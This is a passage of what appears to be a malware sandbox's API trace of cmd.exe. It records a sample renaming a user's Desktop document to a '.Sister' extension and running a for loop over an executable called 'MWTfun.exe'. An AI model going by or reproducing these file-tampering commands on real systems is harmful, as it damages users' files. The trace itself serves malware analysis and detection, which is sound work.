MemoryPointer=0x21ed9378a00) returned 0x38a [0172.801] GetProcessHeap () returned 0x21ed8c70000 [0172.801] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94b6e20 [0172.801] GetProcessHeap () returned 0x21ed8c70000 [0172.801] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94b6e20, Size=0x30) returned 0x21ed94b6e20 [0172.801] GetProcessHeap () returned 0x21ed8c70000 [0172.801] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94b6e20) returned 0x30 [0172.801] GetProcessHeap () returned 0x21ed8c70000 [0172.801] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94b6e60 [0172.801] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0172.803] GetProcessHeap () returned 0x21ed8c70000 [0172.803] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8d50 [0172.803] ??_V@YAXPEAX@Z () returned 0x1 [0172.803] GetProcessHeap () returned 0x21ed8c70000 [0172.803] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94b6e60, Size=0x180) returned 0x21ed94b6e60 [0172.803] GetProcessHeap () returned 0x21ed8c70000 [0172.803] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94b6e60) returned 0x180 [0172.803] GetProcessHeap () returned 0x21ed8c70000 [0172.803] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68bf0 [0172.803] GetProcessHeap () returned 0x21ed8c70000 [0172.803] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68bf0, Size=0x290) returned 0x21ed8d68bf0 [0172.803] GetProcessHeap () returned 0x21ed8c70000 [0172.803] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68bf0) returned 0x290 [0172.803] GetProcessHeap () returned 0x21ed8c70000 [0172.803] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68e90 [0172.803] GetProcessHeap () returned 0x21ed8c70000 [0172.803] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68e90, Size=0x30) returned 0x21ed8d68e90 [0172.804] GetProcessHeap () returned 0x21ed8c70000 [0172.804] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68e90) returned 0x30 [0172.804] GetProcessHeap () returned 0x21ed8c70000 [0172.804] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68ed0 [0172.804] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0172.804] GetProcessHeap () returned 0x21ed8c70000 [0172.804] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8b10 [0172.804] ??_V@YAXPEAX@Z () returned 0x1 [0172.804] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0172.804] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d64aa0 [0172.804] FindClose (in: hFindFile=0x21ed8d64aa0 | out: hFindFile=0x21ed8d64aa0) returned 1 [0172.805] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d64b00 [0172.805] FindClose (in: hFindFile=0x21ed8d64b00 | out: hFindFile=0x21ed8d64b00) returned 1 [0172.805] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x90bb1c58, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x90bb1c58, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65760 [0172.805] FindClose (in: hFindFile=0x21ed8d65760 | out: hFindFile=0x21ed8d65760) returned 1 [0172.805] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\qyx1bfBq1UB8.odt", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98dbd970, ftCreationTime.dwHighDateTime=0x1d5ef98, ftLastAccessTime.dwLowDateTime=0x5ab0e890, ftLastAccessTime.dwHighDateTime=0x1d5eef1, ftLastWriteTime.dwLowDateTime=0x5ab0e890, ftLastWriteTime.dwHighDateTime=0x1d5eef1, nFileSizeHigh=0x0, nFileSizeLow=0x124df, dwReserved0=0x4, dwReserved1=0x80, cFileName="qyx1bfBq1UB8.odt", cAlternateFileName="QYX1BF~1.ODT")) returned 0x21ed8d657c0 [0172.805] FindClose (in: hFindFile=0x21ed8d657c0 | out: hFindFile=0x21ed8d657c0) returned 1 [0172.805] _wcsnicmp (_String1="QYX1BF~1.ODT", _String2="qyx1bfBq1UB8.odt", _MaxCount=0x10) returned 28 [0172.806] malloc (_Size=0x1ff9c) returned 0x21ed95dffc0 [0172.807] ??_V@YAXPEAX@Z () returned 0x21ed95dffc0 [0172.808] GetProcessHeap () returned 0x21ed8c70000 [0172.808] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2a) returned 0x21ed8cc8b90 [0172.808] ??_V@YAXPEAX@Z () returned 0x1 [0172.808] ??_V@YAXPEAX@Z () returned 0x1 [0172.808] GetProcessHeap () returned 0x21ed8c70000 [0172.808] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68ed0, Size=0x180) returned 0x21ed8d68ed0 [0172.808] GetProcessHeap () returned 0x21ed8c70000 [0172.808] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68ed0) returned 0x180 [0172.808] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0172.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0172.808] GetFileType (hFile=0x50) returned 0x2 [0172.808] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0172.808] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0172.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0172.923] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0173.024] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0173.024] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0173.024] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0173.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0173.024] GetFileType (hFile=0x50) returned 0x2 [0173.024] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0173.024] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0173.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0173.171] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0173.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0173.249] GetFileType (hFile=0x50) returned 0x2 [0173.250] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0173.250] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0173.338] _get_osfhandle (_FileHandle=1) returned 0x50 [0173.338] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed94b6e30*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed94b6e30*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0173.423] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"qyx1bfBq1UB8.odt\" \"qyx1bfBq1UB8.odt.Sister\" ") returned 46 [0173.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0173.423] GetFileType (hFile=0x50) returned 0x2 [0173.423] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0173.423] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0173.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0173.496] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2e) returned 1 [0173.703] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0173.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0173.703] GetFileType (hFile=0x50) returned 0x2 [0173.703] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0173.703] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0173.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0173.776] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0173.849] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0173.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0173.849] GetFileType (hFile=0x50) returned 0x2 [0173.849] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0173.849] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0173.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0173.944] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0174.015] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0174.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.015] GetFileType (hFile=0x50) returned 0x2 [0174.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.016] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0174.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.206] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0174.286] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0174.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.286] GetFileType (hFile=0x50) returned 0x2 [0174.286] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.287] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0174.344] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.344] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0174.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.361] GetFileType (hFile=0x50) returned 0x2 [0174.361] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.361] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0174.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.395] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d68ea0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d68ea0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0174.413] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"qyx1bfBq1UB8.odt.Sister\" \"qyx1bfBq1UB8.bat\" ") returned 46 [0174.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.414] GetFileType (hFile=0x50) returned 0x2 [0174.414] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.414] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0174.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.434] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2e) returned 1 [0174.442] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0174.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.442] GetFileType (hFile=0x50) returned 0x2 [0174.442] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.442] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0174.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.452] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0174.479] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0174.485] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0174.486] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0174.486] malloc (_Size=0xffce) returned 0x21ed95dffc0 [0174.486] ??_V@YAXPEAX@Z () returned 0x21ed95dffc0 [0174.486] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0174.486] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0174.486] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0174.486] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0174.486] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0174.486] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0174.486] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0174.486] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0174.486] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0174.486] ??_V@YAXPEAX@Z () returned 0x1 [0174.486] GetProcessHeap () returned 0x21ed8c70000 [0174.486] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xc8) returned 0x21ed92a0180 [0174.486] GetProcessHeap () returned 0x21ed8c70000 [0174.486] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92a0180, Size=0x6c) returned 0x21ed8d67530 [0174.487] GetProcessHeap () returned 0x21ed8c70000 [0174.487] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67530) returned 0x6c [0174.487] GetProcessHeap () returned 0x21ed8c70000 [0174.487] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67a30 [0174.487] GetProcessHeap () returned 0x21ed8c70000 [0174.487] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xc8) returned 0x21ed92a0250 [0174.487] GetProcessHeap () returned 0x21ed8c70000 [0174.487] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92a0250, Size=0x6c) returned 0x21ed8d67b30 [0174.487] GetProcessHeap () returned 0x21ed8c70000 [0174.487] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67b30) returned 0x6c [0174.487] malloc (_Size=0xffce) returned 0x21ed95dffc0 [0174.487] ??_V@YAXPEAX@Z () returned 0x21ed95dffc0 [0174.487] GetProcessHeap () returned 0x21ed8c70000 [0174.487] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d653a0 [0174.487] GetProcessHeap () returned 0x21ed8c70000 [0174.487] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9485210 [0174.487] _wcsicmp (_String1="qyx1bfBq1UB8.odt", _String2=".") returned 67 [0174.487] _wcsicmp (_String1="qyx1bfBq1UB8.odt", _String2="..") returned 67 [0174.487] GetFileAttributesW (lpFileName="qyx1bfBq1UB8.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\qyx1bfbq1ub8.odt")) returned 0x20 [0174.489] GetProcessHeap () returned 0x21ed8c70000 [0174.489] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed94b6ff0 [0174.490] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed94b7000 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0174.490] SetErrorMode (uMode=0x0) returned 0x0 [0174.491] SetErrorMode (uMode=0x1) returned 0x0 [0174.491] GetFullPathNameW (in: lpFileName="qyx1bfBq1UB8.odt", nBufferLength=0x7fe7, lpBuffer=0x21ed95dffc0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\qyx1bfBq1UB8.odt", lpFilePart=0xa6cf4fd660*="qyx1bfBq1UB8.odt") returned 0x28 [0174.491] SetErrorMode (uMode=0x0) returned 0x1 [0174.491] GetProcessHeap () returned 0x21ed8c70000 [0174.491] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9483e90 [0174.491] _wcsicmp (_String1="qyx1bfBq1UB8.odt", _String2=".") returned 67 [0174.491] _wcsicmp (_String1="qyx1bfBq1UB8.odt", _String2="..") returned 67 [0174.491] GetFileAttributesW (lpFileName="qyx1bfBq1UB8.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\qyx1bfbq1ub8.odt")) returned 0x20 [0174.491] ??_V@YAXPEAX@Z () returned 0x1 [0174.491] malloc (_Size=0xffce) returned 0x21ed95dffc0 [0174.491] ??_V@YAXPEAX@Z () returned 0x21ed95dffc0 [0174.491] malloc (_Size=0xffce) returned 0x21ed95effa0 [0174.491] ??_V@YAXPEAX@Z () returned 0x21ed95effa0 [0174.492] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\qyx1bfBq1UB8.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\qyx1bfbq1ub8.odt")) returned 0x20 [0174.492] malloc (_Size=0xffce) returned 0x21ed923fd00 [0174.492] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0174.492] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\qyx1bfBq1UB8.odt", fInfoLevelId=0x1, lpFindFileData=0x21ed9485220, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9485220) returned 0x21ed8d64da0 [0174.493] malloc (_Size=0xffce) returned 0x21ed924fce0 [0174.493] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0174.493] ??_V@YAXPEAX@Z () returned 0x1 [0174.493] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\qyx1bfBq1UB8.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\qyx1bfbq1ub8.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\qyx1bfBq1UB8.odt.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\qyx1bfbq1ub8.odt.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0174.506] FindNextFileW (in: hFindFile=0x21ed8d64da0, lpFindFileData=0x21ed9485220 | out: lpFindFileData=0x21ed9485220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98dbd970, ftCreationTime.dwHighDateTime=0x1d5ef98, ftLastAccessTime.dwLowDateTime=0x5ab0e890, ftLastAccessTime.dwHighDateTime=0x1d5eef1, ftLastWriteTime.dwLowDateTime=0x5ab0e890, ftLastWriteTime.dwHighDateTime=0x1d5eef1, nFileSizeHigh=0x0, nFileSizeLow=0x124df, dwReserved0=0x0, dwReserved1=0x0, cFileName="qyx1bfBq1UB8.odt", cAlternateFileName="")) returned 0 [0174.508] GetLastError () returned 0x12 [0174.508] FindClose (in: hFindFile=0x21ed8d64da0 | out: hFindFile=0x21ed8d64da0) returned 1 [0174.508] ??_V@YAXPEAX@Z () returned 0x1 [0174.508] ??_V@YAXPEAX@Z () returned 0x1 [0174.508] ??_V@YAXPEAX@Z () returned 0x1 [0174.510] ??_V@YAXPEAX@Z () returned 0x1 [0174.510] GetProcessHeap () returned 0x21ed8c70000 [0174.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64aa0 [0174.510] GetProcessHeap () returned 0x21ed8c70000 [0174.510] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95500, Size=0x16) returned 0x21ed8c95640 [0174.510] GetProcessHeap () returned 0x21ed8c70000 [0174.510] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95640) returned 0x16 [0174.511] GetProcessHeap () returned 0x21ed8c70000 [0174.511] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0174.511] GetProcessHeap () returned 0x21ed8c70000 [0174.511] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0174.511] GetProcessHeap () returned 0x21ed8c70000 [0174.511] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed9496ac0 [0174.511] GetProcessHeap () returned 0x21ed8c70000 [0174.511] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9496ac0, Size=0xb2) returned 0x21ed9496ac0 [0174.511] GetProcessHeap () returned 0x21ed8c70000 [0174.511] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9496ac0) returned 0xb2 [0174.511] GetProcessHeap () returned 0x21ed8c70000 [0174.511] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69060 [0174.511] GetProcessHeap () returned 0x21ed8c70000 [0174.511] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69060, Size=0x30) returned 0x21ed8d69060 [0174.511] GetProcessHeap () returned 0x21ed8c70000 [0174.511] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69060) returned 0x30 [0174.511] GetProcessHeap () returned 0x21ed8c70000 [0174.511] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d690a0 [0174.511] malloc (_Size=0x1ff9c) returned 0x21ed95dffc0 [0174.514] GetProcessHeap () returned 0x21ed8c70000 [0174.514] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937c6d0 [0174.515] GetProcessHeap () returned 0x21ed8c70000 [0174.515] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937e1d0 [0174.515] ??_V@YAXPEAX@Z () returned 0x1 [0174.515] malloc (_Size=0x1ff9c) returned 0x21ed95dffc0 [0174.515] GetProcessHeap () returned 0x21ed8c70000 [0174.515] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937e050 [0174.515] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed95dffc0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0174.515] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65040 [0174.515] FindClose (in: hFindFile=0x21ed8d65040 | out: hFindFile=0x21ed8d65040) returned 1 [0174.515] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, 